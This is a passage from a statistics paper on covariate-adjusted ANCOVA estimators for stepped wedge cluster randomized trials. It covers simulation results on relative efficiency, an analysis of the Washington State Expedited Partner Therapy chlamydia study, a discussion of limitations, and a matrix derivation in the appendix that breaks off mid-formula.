\[Y_{ijk}(0) =\frac{j+1}{J+2}+X_{ij1}+\left(X_{ijk2}-\overline{X}_{j2}\right)^ {2}+c_{i}+e_{ijk},\] \[Y_{ijk}(1) =Y_{ijk}(0)+\frac{2N_{ij}I}{(J+2)^{-1}\sum_{j=0}^{J+1}N_{j}}+0.5( j+1)X_{ij1}+\frac{j+1}{J+2}\left(X_{ijk2}-\overline{X}_{j2}\right)^{3},\] with \(c_{i}\sim\mathcal{N}(0,0.1)\) and \(e_{ijk}\sim\mathcal{N}(0,0.9)\). 3. 
Scenario III: the random effects go beyond the simple compound symmetry structure, where
\[Y_{ijk}(0)=\frac{j+1}{J+2}+X_{ij1}+\left(X_{ijk2}-\overline{X}_{j2}\right)^{2}+c_{i}+b_{ij}+e_{ijk},\]
\[Y_{ijk}(1)=Y_{ijk}(0)+\frac{2N_{ij}I}{(J+2)^{-1}\sum_{j=0}^{J+1}N_{j}}+0.5X_{ij1}+\left(X_{ijk2}-\overline{X}_{j2}\right)^{3}+d_{i},\]
with \(c_{i}\sim\mathcal{N}(0,0.05)\), \(b_{ij}\sim\mathcal{N}(0,0.05)\), \(d_{i}\sim\mathcal{N}(0,0.1)\), and \(e_{ijk}\sim\mathcal{N}(0,0.9)\). The cluster-period-specific random effects, \(b_{ij}\), and the cluster random effects, \(d_{i}\), are independent of each other and of the other components. In the stepped wedge cluster randomized experiment literature, this correlation structure can be viewed as a combination of the nested exchangeable structure with a random intervention effect (Hooper et al., 2016; Hemming et al., 2018). 4. Scenario IV: the distributions of the random effects are non-normal, where
\[Y_{ijk}(0)=\frac{j+1}{J+2}+X_{ij1}+\left(X_{ijk2}-\overline{X}_{j2}\right)^{2}+c_{i}+e_{ijk},\]
\[Y_{ijk}(1)=Y_{ijk}(0)+\frac{2N_{ij}I}{(J+2)^{-1}\sum_{j=0}^{J+1}N_{j}}+0.5X_{ij1}+\left(X_{ijk2}-\overline{X}_{j2}\right)^{3},\]
with \(c_{i}\sim\mathcal{CG}(1,0.1)\), a centered gamma distribution with variance 0.1, and \(e_{ijk}\sim\mathcal{CP}(0.9)\), a centered Poisson distribution with variance 0.9. We consider two cases where the sample size is relatively small (\(I=18\)) and relatively large (\(I=60\)). As in simulation study I, we conduct 1,000 simulation replications with models (3)-(6) fitted with \(X_{ij1}\) and \(X_{ijk2}\) but without further adjusting for cluster-period size; results for all metrics (BIAS, RMSE, ESE, ASE) and the empirical coverage percentages of 95% confidence intervals (CIs) using the DB and CRSE estimators are analogously obtained. Here, we focus on presenting the relative efficiency (RE) of each ANCOVA estimator to the unadjusted estimator in Figures 1 and 2 (a larger RE indicates that the ANCOVA estimator is more efficient in finite samples); more detailed results are available in Web Tables 2-7 of Web Appendix C. As expected, the unadjusted estimator is less efficient than the ANCOVA estimators, confirming the benefits of covariate adjustment under staggered cluster rollout. When the number of clusters is small (\(I=18\)), ANCOVA I and III exhibit higher RE than the other estimators. Comparing across the four ANCOVA estimators, the estimators not including period-specific effects (ANCOVA I and III) demonstrate higher RE, likely because the ANCOVA II and IV estimators require estimating a significantly larger number of model parameters, which can lead to finite-sample efficiency loss. Comparing between the two pairs of ANCOVA estimators, i.e., ANCOVA I vs. III and II vs. IV, we found that the estimators including interactions between treatment indicators and covariates can improve RE in most settings, except for estimating \(\tau^{period}\) and \(\tau^{cell}\) under scenario II, where ANCOVA I has higher RE than ANCOVA III. This is in slight contradiction to the earlier results for individually randomized experiments (Lin, 2013), where the fully-interacted model is always asymptotically more efficient. With more clusters (\(I=60\)), Figure 2 shows that estimators including treatment-by-covariate interactions outperform their counterparts without interactions in most simulation settings, endorsing existing results for parallel-arm cluster randomized experiments.
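The relative efficiency used in these comparisons can be computed from the replicate point estimates as sketched below, a minimal example assuming RE is defined as the ratio of empirical variances across replicates (so that RE > 1 favors the covariate-adjusted estimator):

```python
import numpy as np

def relative_efficiency(est_unadjusted, est_ancova):
    """Ratio of empirical variances over simulation replicates; values above 1
    indicate that the ANCOVA estimator is more efficient in finite samples."""
    return np.var(est_unadjusted, ddof=1) / np.var(est_ancova, ddof=1)
```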
In particular, ANCOVA IV, the estimator assisted by the most richly parameterized working model, yields the highest RE in Scenario II, where the true individual treatment effect depends on the period through the period-specific main covariate effect in \(Y_{ijk}(1)\). This is likely because ANCOVA IV most accurately reflects the true data-generating process, where period-specific covariate effects and treatment-by-covariate interactions are simultaneously accounted for by the model structure (and such structures are estimable with 60 clusters). Overall, if a sufficient number of clusters are present, we recommend ANCOVA III and IV for efficiency considerations. If only a limited number of clusters are present, the use of ANCOVA III does not appear to compromise finite-sample efficiency much under a relatively parsimonious working model parameterization, and may be preferred. Finally, we present in Web Figures 2-3 of Web Appendix D the relative efficiency results when \(N_{ij}\) is included as an additional covariate in the ANCOVA working models. (More detailed results are available in Web Tables 11-16 of Web Appendix D.) While the overall observations are similar to the above simulations without adjusting for \(N_{ij}\), a notable difference is that with \(I=18\), ANCOVA IV becomes the least efficient and can even be substantially less efficient than the unadjusted estimator (occasionally the RE \(=0.5\)). This suggests that one should exercise caution when adjusting for cluster-period size via ANCOVA IV if a limited number of clusters cannot support the large number of parameters that need to be estimated for this working model.

Figure 1: Relative efficiency of proposed estimators from simulation study II with 1,000 simulation replications. UN = unadjusted, AN I-IV = ANCOVA I-IV. The number of clusters \(I=18\).

## 5 Application to the Washington State Expedited Partner Therapy study

We illustrate the application of the model-assisted estimators by analyzing the Washington State Expedited Partner Therapy (EPT) study. The Washington State EPT study is a stepped wedge cluster randomized experiment designed to evaluate the effectiveness of an expedited patient-delivered partner notification strategy, which aims to treat the sex partners of persons with sexually transmitted infections without their medical evaluation, and thus increase partner treatment and decrease gonorrhea and chlamydia reinfection rates (Golden et al., 2015). The trial was conducted from October 2007 to August 2009, with four waves (1 pre-rollout period, 3 rollout periods and 1 post-rollout period) separated by six-month intervals. A total of 22 local health jurisdictions (LHJs, i.e., clusters) were randomly assigned to the four different treatment adoption times and provide individual-level outcome data measured on distinct sentinel women sampled during each period. In each of the three rollout periods, six previously untreated LHJs were given the intervention, and in the post-rollout period, the remaining four untreated LHJs were assigned to the treatment arm. We focus on the binary outcome, Chlamydia infection status, in this analysis, with value equal to 1 if the sentinel woman reports Chlamydia at the time of assessment and 0 otherwise; therefore, all estimands are interpreted on the risk difference scale. The cluster-period (cell) size \(N_{ij}\) during rollout ranges from 41 to 1553, with a standard deviation of 331 (see Figure 1 in Li et al. (2022) and Tian et al.
(2022) for a detailed depiction of cluster-period sizes over the pre-rollout, rollout, and post-rollout periods). Due to the substantial variation in cluster sizes, informative cluster size cannot be ruled out, and we are therefore interested in quantifying the three different estimands introduced in Table 1. We apply the unadjusted estimator and the proposed model-assisted ANCOVA estimators (ANCOVA I-IV) to the Washington State EPT study data by fitting models (3)-(6), with two covariates (age measured at baseline and an LHJ-level Chlamydia prevalence measured at baseline) that are believed to have good prognostic value. Estimation results from the various estimators, with standard errors obtained from the two different approaches, are given in Table 5. Results adjusted for cluster-period size as an additional covariate are presented in Web Table 17 of Web Appendix D and are generally similar. Overall, the results indicate that the intervention implemented in the Washington State EPT study shows a beneficial effect in reducing the likelihood of Chlamydia, as the signs of all point estimates are negative. The estimates have a clear ordering such that \(|\widehat{\tau}^{cell}|>|\widehat{\tau}^{period}|>|\widehat{\tau}^{ind}|\), suggesting the largest effect may be observed once we consider an average at the cell level. For each of the three estimands, the unadjusted estimator yields the largest standard error estimate, and the ANCOVA I-IV estimators appear to improve the estimation precision with a smaller standard error estimate. Our simulations show that the ANCOVA III estimator demonstrates the highest estimation efficiency under most scenarios, and the DB approach provides relatively accurate estimation of the uncertainty for this approach; therefore we primarily interpret this result here. For the individual-average treatment effect \(\tau^{ind}\), the point estimate is \(-0.0087\); therefore, after averaging over all sentinel women during rollout, the EPT intervention can prevent 87 positive Chlamydia infection cases per 10 thousand women during a six-month interval (with statistical significance at the 10% level). For the period-average treatment effect \(\tau^{period}\), the point estimate is \(-0.0111\); therefore, during an average rollout period, after averaging over all sentinel women, the EPT intervention can prevent 111 positive Chlamydia infection cases per 10 thousand women (with statistical significance at the 5% level). For the cell-average treatment effect \(\tau^{cell}\), the point estimate is \(-0.0142\); therefore, after averaging all cluster-period cells during rollout, the EPT intervention can prevent 142 positive Chlamydia infection cases per 10 thousand women. These results generally corroborate the model-based analysis results in Golden et al. (2015) and Li et al. (2022), even though the previous analyses did not address variations in estimands due to potentially informative cluster-period size.

Figure 2: Relative efficiency of proposed estimators from simulation study II with 1,000 simulation replications. UN = unadjusted, AN I-IV = ANCOVA I-IV. The number of clusters \(I=60\).

## 6 Discussion

In this article, we have studied model-assisted analyses of stepped wedge cluster randomized experiments and elucidated considerations on estimands, covariate adjustment as well as statistical inference strategies.
Specifically, we examined a class of weighted average treatment effects as nonparametric estimands, where three interpretable members can be obtained by selecting specific weights. Leveraging the ANCOVA working models, a class of estimators was developed to exploit baseline covariate information and improve estimation efficiency over the conventional unadjusted difference-in-means estimators. Asymptotic results for the proposed estimators were established via finite population Central Limit Theorems, i.e., results that confirm that the proposed estimators are consistent and asymptotically normal as the number of clusters increases to infinity. We have also conducted simulation studies to evaluate the finite-sample properties of the ANCOVA estimators and compare their performances to inform practical recommendations. To the best of our knowledge, this is the first effort that systematically investigates model-robust causal inference methods for stepped wedge cluster randomized experiments that analyze individual-level data. While it is generally challenging to analytically compare the four ANCOVA models under staggered rollout randomization designs, we have conducted numerical experiments to inform model choices in practice. The following main messages are generated from our simulation evaluations. (1) All five estimators, including the unadjusted estimator, are asymptotically unbiased, where, as the number of clusters increases, the relative biases decrease. This indicates that including covariates in the ANCOVA models does not compromise bias, as long as the correct weights are specified to target a specific estimand. (2) The DB variance estimator can be conservative for the unadjusted, ANCOVA I and II estimators. While the DB approach demonstrates the desired estimation accuracy for the ANCOVA III estimator regardless of sample size, it often underestimates the variance of the ANCOVA IV estimator when the sample size is small.

\begin{table}
\begin{tabular}{l c c c c c c}
\hline \hline
 & \multicolumn{2}{c}{\(\tau^{ind}\)} & \multicolumn{2}{c}{\(\tau^{period}\)} & \multicolumn{2}{c}{\(\tau^{cell}\)} \\
\cline{2-7}
Estimators & DB & CRSE & DB & CRSE & DB & CRSE \\
\hline
Unadjusted & -0.0032 & -0.0032 & -0.0065 & -0.0065 & -0.0137 & -0.0137 \\
 & (0.0049) & (0.0044) & (0.0053) & (0.0049) & (0.0102) & (0.0093) \\
ANCOVA I & -0.0068 & -0.0068\({}^{*}\) & -0.0095\({}^{*}\) & -0.0095\({}^{*}\) & -0.0140 & -0.0140 \\
 & (0.0045) & (0.0040) & (0.0049) & (0.0043) & (0.0096) & (0.0087) \\
ANCOVA II & -0.0066 & -0.0066\({}^{*}\) & -0.0092\({}^{*}\) & -0.0092\({}^{*}\) & -0.0143 & -0.0143 \\
 & (0.0044) & (0.0040) & (0.0048) & (0.0043) & (0.0096) & (0.0087) \\
ANCOVA III & -0.0087\({}^{*}\) & -0.0087\({}^{*}\) & -0.0111\({}^{**}\) & -0.0111\({}^{**}\) & -0.0140 & -0.0140 \\
 & (0.0045) & (0.0043) & (0.0044) & (0.0041) & (0.0095) & (0.0087) \\
ANCOVA IV & -0.0037 & -0.0037 & -0.0071\({}^{*}\) & -0.0071 & -0.0142 & -0.0142 \\
 & (0.0039) & (0.0049) & (0.0040) & (0.0045) & (0.0094) & (0.0090) \\
\hline \hline
\multicolumn{7}{l}{\({}^{**}\)Statistically significant at the 5% level, two-tailed test.} \\
\multicolumn{7}{l}{\({}^{*}\)Statistically significant at the 10% level, two-tailed test.} \\
\end{tabular}
\end{table}
Table 5: Estimated average treatment effects on the risk difference scale and their standard errors for the Washington State EPT study. Standard errors are given in parentheses. DB = design-based standard error. CRSE = cluster-robust standard error.
(3) The CRSE variance estimator yields accurate estimates for the unadjusted, ANCOVA I and II estimators with a limited number of clusters, and can be conservative in larger samples. For ANCOVA III and IV, the CRSE estimator tends to underestimate the true variance, though the degree of underestimation diminishes when the sample size increases. (4) The unadjusted estimator is generally less efficient than the ANCOVA estimators, which aligns with the results from Lin (2013) and Su and Ding (2021) that adjusting for covariates increases estimation efficiency in individually randomized experiments and parallel-arm cluster randomized experiments. (5) Comparing the estimators assisted by models including treatment-by-covariate interactions with their counterparts without interactions, the fully-interacted estimators show higher RE in most settings. However, in a few simulation settings, the models without interactions give better performance. This finding aligns with results in Su and Ding (2021) that including interactions in analyzing individual-level data does not always increase estimation efficiency in parallel-arm cluster randomized experiments. (6) With a limited number of clusters, estimators assisted by more parsimonious models, i.e., ANCOVA I and III, tend to give better performance in terms of estimation efficiency. When the sample size increases, estimators assisted by richly parameterized models, especially ANCOVA IV, demonstrate higher estimation efficiency. (7) Adjusting for cluster-period size as an additional covariate in the ANCOVA models can improve estimation efficiency when the number of clusters is large. With a small number of clusters, however, including cluster-period size can lead to a less efficient estimator under ANCOVA IV compared to the unadjusted estimator. Summarizing this evidence, we find that, in general, if the number of clusters is limited, ANCOVA III coupled with the DB variance estimator can be adequate for statistical inference. There are several potential limitations of our current study. First, we have focused on estimators assisted by ANCOVA models without duration effects. When the true treatment effect depends on the length of exposure, Kenny et al. (2022) and Maleyeff et al. (2022) showed that a model assuming a constant treatment effect can yield an estimated effect in the opposite direction of the true effect. Similar observations have also been discussed in Sun and Abraham (2021) for difference-in-differences designs. It may be possible to modify our ANCOVA working models to target a new class of duration-specific weighted average treatment effects, and we leave this development to future work. Second, our finite population framework and estimands currently do not explicitly address the missing potential outcomes during the pre-rollout and post-rollout periods, as treatment positivity is technically violated by construction of the stepped wedge design in those periods. It may be intriguing to expand our estimand definitions to accommodate those periods, but identification would necessarily require additional assumptions (either structural or modeling) to extrapolate from the rollout periods to the pre- and post-rollout periods.
For example, the conventional linear mixed models (Li et al., 2021) consider random effects at the cluster and cluster-period levels to implicitly impute the unobserved potential outcomes during all study periods, and have been demonstrated to be model-robust under certain structural assumptions for parallel-arm cluster randomized experiments (Wang et al., 2021, 2022). This may suggest that alternative, mixed-effects model formulations that leverage observed data from the pre- and post-rollout periods may yield estimators targeting equally interpretable estimands with improved efficiency over the estimators studied in this work. The exact identification conditions for mixed-effects models to achieve model-assisted causal inference in stepped wedge designs, however, are yet to be formalized, and will be pursued in our future research.

## Web Appendix A1 Proof of Lemma 1

### Web Appendix A1.1 ANCOVA I

Here we adopt the approach proposed in Schochet et al. (2021) by centering the treatment status indicator, which simplifies the derivation process without altering the interpretation of the parameter of interest, \(\tau_{j}\), or the properties of its estimator. Specifically, we consider the centered treatment status indicator, \(\widetilde{Z}_{ij}=Z_{ij}-w_{j}^{1}/w_{j}\), where \(w_{j}^{1}/w_{j}\) is only related to rollout period \(j\) and is fixed after the randomization is carried out. Therefore, the centering operation here does not alter the interpretation or the estimate of \(\tau_{j}\). Using this approach, the ANCOVA I model can be alternatively represented as:
\[Y_{ijk}=\sum_{j^{\prime}=1}^{J}\beta_{j^{\prime}}\mathbb{I}_{ijk,j^{\prime}}+\sum_{j^{\prime}=1}^{J}\tau_{j^{\prime}}\mathbb{I}_{ijk,j^{\prime}}\widetilde{Z}_{ij^{\prime}}+\widetilde{\mathbf{X}}_{ijk}\mathbf{\gamma}+e_{ijk},\]
where \(\mathbb{I}_{ijk,j^{\prime}}\) is an indicator variable introduced to facilitate the derivation, which is equal to 1 if \(j^{\prime}\) is the same as the rollout period \(j\), and 0 otherwise. This re-expression using \(\mathbb{I}_{ijk,j^{\prime}}\) allows us to easily form design matrices and is thus also adopted for the other ANCOVA models in the Web Appendix. The derivation of \(\widehat{\tau}_{j}\) largely follows Section A.3.1 in the Web Appendix of Schochet et al. (2021). We give the detailed derivation here, and readers may also refer to Schochet et al. (2021) for specific steps on ANCOVA I. Under ANCOVA I, we have the following design matrix
\[\mathbf{D}_{i}=\left(\begin{array}{ccc}\otimes_{j=1}^{J}\widetilde{Z}_{ij}\mathbf{1}_{N_{ij}}&\otimes_{j=1}^{J}\mathbf{1}_{N_{ij}}&\widetilde{\mathbf{X}}_{i}\end{array}\right),\]
where '\(\otimes\)' is the block diagonal operator, and \(\widetilde{\mathbf{X}}_{i}\) is the matrix whose rows are the \(\widetilde{\mathbf{X}}_{ijk}\).
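As a computational illustration of this centered-treatment reparameterization, the following is a minimal Python/NumPy sketch (not part of the original derivation) of fitting the ANCOVA I working model by weighted least squares; the individual-level arrays `Y`, `w`, `period`, `Z`, and the pre-centered covariate matrix `X` are illustrative placeholders, and the first \(J\) returned coefficients correspond to \(\widehat{\tau}_{1},\ldots,\widehat{\tau}_{J}\).

```python
import numpy as np

def fit_ancova1_wls(Y, w, period, Z, X, J):
    """WLS fit of the ANCOVA I working model with centered treatment indicators.

    Y, w : (n,) outcomes and individual weights
    period : (n,) rollout period index in {1, ..., J}
    Z : (n,) cluster-period treatment indicator Z_ij carried to each individual
    X : (n, p) covariate matrix, assumed already centered
    """
    Y, w, Z = map(np.asarray, (Y, w, Z))
    period, X = np.asarray(period), np.asarray(X)
    P = (period[:, None] == np.arange(1, J + 1)).astype(float)   # period indicators
    # weighted treated share w_j^1 / w_j within each period, used for centering
    share = np.array([np.average(Z[period == j], weights=w[period == j])
                      for j in range(1, J + 1)])
    Zc = Z - share[period - 1]                                    # centered indicator
    D = np.hstack([P * Zc[:, None], P, X])   # [tau terms | period effects | covariates]
    WD = w[:, None] * D
    coef = np.linalg.solve(D.T @ WD, D.T @ (w * Y))               # WLS normal equations
    return coef[:J]                                               # tau_hat_1, ..., tau_hat_J
```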
Then \[\mathbf{D}_{i}^{\prime}=\left(\begin{array}{c}\otimes_{j=1}^{J} \widetilde{Z}_{ij}\mathbf{1}_{N_{ij}}^{\prime}\\ \otimes_{j=1}^{J}\mathbf{1}_{N_{ij}}^{\prime}\\ \widetilde{\mathbf{X}}_{i}^{\prime}\end{array}\right),\ \ \mathbf{W}_{i}=\otimes_{j=1}^{J}\mathbf{W}_{ij},\ \ \mathbf{W}_{ij}=\left(\otimes_{k=1}^{N_{ij}}w_{ijk}\right),\ \ \mathbf{Y}_{i}=\left( \begin{array}{c}\mathbf{Y}_{i1}\\ \vdots\\ \mathbf{Y}_{iJ}\end{array}\right).\] The estimated regression coefficient vector \((\widehat{\tau}_{1},\ldots,\widehat{\tau}_{J},\widehat{\beta}_{1},\ldots, \widehat{\beta}_{J},\widehat{\gamma}^{\prime})^{\prime}=\left(\sum_{i=1}^{I} \mathbf{D}_{i}^{\prime}\mathbf{W}_{i}\mathbf{D}_{i}\right)^{-1}\left(\sum_{i=1}^{I}\mathbf{D}_ {i}^{\prime}\mathbf{W}_{i}\mathbf{Y}_{i}\right)\). \[\sum_{i=1}^{I}\mathbf{D}_{i}^{\prime}\mathbf{W}_{i}\mathbf{D}_{i}=\sum_{i=1}^{I}\left( \begin{array}{cccc}\otimes_{j=1}^{J}\left(\widetilde{Z}_{ij}^{2}\mathbf{1}_{N_{ ij}}^{\prime}\mathbf{W}_{ij}\mathbf{1}_{N_{ij}}\right)&\otimes_{j=1}^{J}\left( \widetilde{Z}_{ij}\mathbf{1}_{N_{ij}}^{\prime}\mathbf{W}_{ij}\mathbf{1}_{N_{ij}}\right)& \otimes_{j=1}^{J}\left(\mathbf{\tilde{Z}}_{ij}\mathbf{1}_{N_{ij}}^{\prime}\mathbf{W}_{ij} \mathbf{1}_{N_{ij}}\right)&\left(\otimes_{j=1}^{J}\widetilde{Z}_{ij}\mathbf{1}_{N_{ij }}^{\prime}\right)\mathbf{W}_{i}\widetilde{\mathbf{X}}_{i}\\ \otimes_{j=1}^{J}\left(\widetilde{Z}_{ij}\mathbf{1}_{N_{ij}}^{\prime}\mathbf{W}_{ij} \mathbf{1}_{N_{ij}}\right)&\otimes_{j=1}^{J}\left(\mathbf{1}_{N_{ij}}^{\prime}\mathbf{W}_{ ij}\mathbf{1}_{N_{ij}}\right)&\left(\otimes_{j=1}^{J}\mathbf{1}_{N_{ij}}^{\prime} \right)\mathbf{W}_{i}\widetilde{\mathbf{X}}_{i}\\ \widetilde{\mathbf{X}}_{i}^{\prime}\mathbf{W}_{i}\left(\otimes_{j=1}^{J}\widetilde{Z}_ {ij}\mathbf{1}_{N_{ij}}\right)&\widetilde{\mathbf{X}}_{i}^{\prime}\mathbf{W}_{i}\left( \otimes_{j=1}^{J}\mathbf{1}_{N_{ij}}\right)&\widetilde{\mathbf{X}}_{i}^{\prime}\mathbf{W} _{i}\widetilde{\mathbf{X}}_{i}\end{array}\right)\] \[=\left(\begin{array}{cccc|cccc}\frac{w_{1}^{0}w_{1}^{1}}{w_{1}}&&&&0&&&\frac{w_{ 1}^{0}w_{1}^{1}}{w_{1}}\left(\overline{\mathbf{X}}_{1}^{1}-\overline{\mathbf{X}}_{1}^{ 0}\right)\\ &&\ddots&&\ddots&&\vdots\\ &&\frac{w_{J}^{0}w_{1}^{1}}{w_{J}}&&&0&\frac{w_{J}^{0}w_{J}^{1}}{w_{J}}\left( \overline{\mathbf{X}}_{J}^{1}-\overline{\mathbf{X}}_{J}^{0}\right)\\ \hline 0&&&&w_{1}&&0_{p}^{0}\\ &&\ddots&&\ddots&&\vdots\\ &&0&&w_{J}&&\mathbf{0}_{p}^{0}\\ \hline\frac{w_{1}^{2}w_{1}^{1}}{w_{1}}\left(\overline{\mathbf{X}}_{1}^{1}-\overline {\mathbf{X}}_{1}^{0}\right)^{\prime}&\cdots&\frac{w_{J}^{0}w_{1}^{1}}{w_{J}}\left( \overline{\mathbf{X}}_{J}^{1}-\overline{\mathbf{X}}_{J}^{0}\right)^{\prime}&\mathbf{0}_{p}& \cdots&\mathbf{0}_{p}&\sum_{i=1}^{I}\sum_{j=1}^{J}\sum_{k=1}^{N_{ij}}w_{ijk} \widetilde{\mathbf{X}}_{ijk}^{\prime}\widetilde{\mathbf{X}}_{ijk}\end{array}\right),\] and \[\sum_{i=1}^{I}\mathbf{D}_{i}^{\prime}\mathbf{W}_{i}\mathbf{Y}_{i}=\sum_{i=1}^{I}\left( \begin{array}{c}\left(\otimes_{j=1}^{J}\widetilde{Z}_{ij}\mathbf{1}_{N_{ij}}^{ \prime}\right)\mathbf{W}_{i}\mathbf{Y}_{i}\\ \left(\otimes_{j=1}^{J}\mathbf{1}_{N_{ij}}^{\prime}\right)\mathbf{W}_{i}\mathbf{Y}_{i}\\ \widetilde{\mathbf{X}}_{i}^{\prime}\mathbf{W}_{i}\mathbf{Y}_{i}\end{array}\right)=\left( \begin{array}{c}\frac{w_{1}^{0}w_{1}^{1}}{w_{1}}\left(\overline{y}_{1}(1)- \overline{y}_{1}(0)\right)\\ \vdots\\ \frac{w_{J}^{0}w_{1}^{1}}{w_{J}}\left(\overline{y}_{1}(1)-\overline{y}_{J}(0) \right)\\ w_{1}\overline{Y}_{1}\\ \vdots\\ w_{J}\overline{Y}_{J}\\ 
\sum_{i=1}^{I}\sum_{j=1}^{J}\sum_{k=1}^{N_{ij}}w_{ijk}Y_{ijk}\widetilde{\mathbf{X}} _{ijk}^{\prime}\end{array}\right).\] The inversion of \(\sum_{i=1}^{I}\mathbf{D}_{i}^{\prime}\mathbf{W}_{i}\mathbf{D}_{i}\) can be carried out by first writing the matrix in four blocks: \[\sum_{i=1}^{I}\mathbf{D}_{i}^{\prime}\mathbf{W}_{i}\mathbf{D}_{i}=\left(\begin{array}{cc} \mathbf{A}&\mathbf{B}\\ \mathbf{C}&\mathbf{D}\end{array}\right),\] where the component matrices are \[\mathbf{A}=\left(\begin{array}{cc}\otimes_{j=1}^{J}\frac{w_{j}^{0}w_{i}^{1}}{w_{ j}}&\mathbf{0}_{J\times J}\\ \mathbf{0}_{J\times J}&\otimes_{j=1}^{J}w_{j}\end{array}\right),\ \ \mathbf{B}=\left(\begin{array}{c} \frac{w_{j}^{0}w_{i}^{1}}{w_{1}}\left(\overline{\mathbf{X}}_{1}^{1}-\overline{\mathbf{X }}_{1}^{0}\right)\\ \vdots\\ \frac{w_{j}^{0}w_{j}^{1}}{w_{J}}\left(\overline{\mathbf{X}}_{J}^{1}-\overline{\mathbf{ X}}_{J}^{0}\right)\\ \mathbf{0}_{p}^{\prime}\\ \vdots\\ \mathbf{0}_{p}^{\prime}\end{array}\right),\] \[\mathbf{C}=\left(\frac{w_{1}^{0}w_{1}^{1}}{w_{1}}\left(\overline{\mathbf{X}}_{1}^{1}- \overline{\mathbf{X}}_{1}^{0}\right)^{\prime},\cdots,\frac{w_{J}^{0}w_{J}^{1}}{w_ {J}}\left(\overline{\mathbf{X}}_{J}^{1}-\overline{\mathbf{X}}_{J}^{0}\right)^{\prime}, \mathbf{0}_{p},\cdots,\mathbf{0}_{p}\right),\] \[\mathbf{D}=\sum_{i=1}^{I}\sum_{j=1}^{J}\sum_{k=1}^{N_{ij}}w_{ijk}\widetilde{\mathbf{X }}_{ijk}^{\prime}\widetilde{\mathbf{X}}_{ijk}.\] Then we use the following block matrix inversion formula: \[\left(\begin{array}{cc}\mathbf{A}&\mathbf{B}\\ \mathbf{C}&\mathbf{D}\end{array}\right)^{-1}=\left(\begin{array}{cc}(\mathbf{A}-\mathbf{B} \mathbf{D}^{-1}\mathbf{C})^{-1}&-\mathbf{A}^{-1}\mathbf{B}(\mathbf{D}-\mathbf{C}\mathbf{A}^{-1}\mathbf{B})^{-1 }\\ -\mathbf{D}^{-1}\mathbf{C}(\mathbf{A}-\mathbf{B}\mathbf{D}^{-1}\mathbf{C})^{-1}&(\mathbf{D}-\mathbf{C}\mathbf{A}^{- 1}\mathbf{B})^{-1}\end{array}\right).\] For simplicity, we derive result for \[\widehat{\mathbf{\tau}}+\left(\begin{array}{c}\overline{\mathbf{X}}_{1}^{1}- \overline{\mathbf{X}}_{1}^{0}\\ \vdots\\ \overline{\mathbf{X}}_{J}^{1}-\overline{\mathbf{X}}_{J}^{0}\end{array}\right)\widehat{ \mathbf{\gamma}}.\] Based on matrix inversion, \[\widehat{\mathbf{\tau}}=\left(\begin{array}{cc}\mathbf{I}_{J}&\mathbf{0}_{J\times J}\end{array} \right)\left(\begin{array}{cc}(\mathbf{A}-\mathbf{B}\mathbf{D}^{-1}\mathbf{C})^{-1}&-\mathbf{A}^ {-1}\mathbf{B}(\mathbf{D}-\mathbf{C}\mathbf{A}^{-1}\mathbf{B})^{-1}\end{array}\right)\left( \begin{array}{c}\frac{w_{0}^{0}w_{1}^{1}}{w_{1}}\left(\overline{y}_{1}(1)- \overline{y}_{1}(0)\right)\\ \vdots\\ \frac{w_{J}^{0}w_{J}^{1}}{w_{J}}\left(\overline{y}_{J}(1)-\overline{y}_{J}(0) \right)\\ w_{1}\overline{Y}_{1}\\ \vdots\\ w_{j}\overline{Y}_{J}\\ \sum_{i=1}^{I}\sum_{j=1}^{J}\sum_{k=1}^{N_{ij}}w_{ijk}Y_{ijk}\widetilde{\mathbf{X }}_{ijk}^{\prime}\end{array}\right),\] and \[\left(\begin{array}{c}\overline{\mathbf{X}}_{1}^{1}-\overline{\mathbf{X}}_{1}^{0}\\ \vdots\\ \overline{\mathbf{X}}_{J}^{1}-\overline{\mathbf{X}}_{J}^{0}\end{array}\right)\widehat{ \mathbf{\gamma}}\] \[=\left(\begin{array}{c}\overline{\mathbf{X}}_{1}^{1}-\overline{\mathbf{X}}_{1}^{0} \\ \vdots\\ \overline{\mathbf{X}}_{J}^{1}-\overline{\mathbf{X}}_{J}^{0}\end{array}\right)\left( \begin{array}{cc}-\mathbf{D}^{-1}\mathbf{C}(\mathbf{A}-\mathbf{B}\mathbf{D}^{-1}\mathbf{C})^{-1}&( \mathbf{D}-\mathbf{C}\mathbf{A}^{-1}\mathbf{B})^{-1}\end{array}\right)\left(\begin{array}{ c}\frac{w_{0}^{0}w_{1}^{1}}{w_{1}}\left(\overline{y}_{1}(1)- \overline{y}_{1}(0)\right)\\ \vdots\\ 
\frac{w_{0}^{0}w_{1}^{1}}{w_{J}}\left(\overline{y}_{J}(1)-\overline{y}_{J}(0) \right)\\ w_{1}\overline{Y}_{1}\\ \vdots\\ w_{j}\overline{Y}_{J}\\ \sum_{i=1}^{I}\sum_{j=1}^{J}\sum_{k=1}^{N_{ij}}w_{ijk}Y_{ijk}\widetilde{\mathbf{X }}_{ijk}^{\prime}\end{array}\right).\] Then \[\widehat{\mathbf{\tau}}+\left(\begin{array}{c}\overline{\mathbf{X}}_{1}^{1}- \overline{\mathbf{X}}_{1}^{0}\\ \vdots\\ \overline{\mathbf{X}}_{J}^{1}-\overline{\mathbf{X}}_{J}^{0}\end{array}\right)\widehat{ \mathbf{\gamma}}=\left(\begin{array}{cc}\mathbf{B}_{1}&\mathbf{B}_{2}\end{array}\right) \left(\begin{array}{c}\frac{w_{1}^{0}w_{1}^{1}}{w_{1}}\left(\overline{y}_{1}(1) -\overline{y}_{1}(0)\right)\\ \vdots\\ \frac{w_{J}^{0}w_{J}^{1}}{w_{J}}\left(\overline{y}_{J}(1)-\overline{y}_{J}(0) \right)\\ w_{1}\overline{Y}_{1}\\ \vdots\\ w_{J}\overline{Y}_{J}\\ \sum_{i=1}^{I}\sum_{j=1}^{J}\sum_{k=1}^{N_{ij}}w_{ijk}Y_{ijk}\widetilde{\mathbf{ X}}_{ijk}^{\prime}\end{array}\right),\] with \[\mathbf{B}_{1}=\left(\begin{array}{cc}\left(\begin{array}{cc}\mathbf{I}_{J}&\mathbf{0}_ {J\times J}\end{array}\right)-\left(\begin{array}{c}\overline{\mathbf{X}}_{1}^{1 }-\overline{\mathbf{X}}_{1}^{0}\\ \vdots\\ \overline{\mathbf{X}}_{J}^{1}-\overline{\mathbf{X}}_{J}^{0}\end{array}\right)\mathbf{D}^{- 1}\mathbf{C}\end{array}\right)(\mathbf{A}-\mathbf{B}\mathbf{D}^{-1}\mathbf{C})^{-1},\] \[\mathbf{B}_{2}=\left(\begin{array}{cc}-\left(\begin{array}{cc}\mathbf{I}_{J}&\mathbf{0 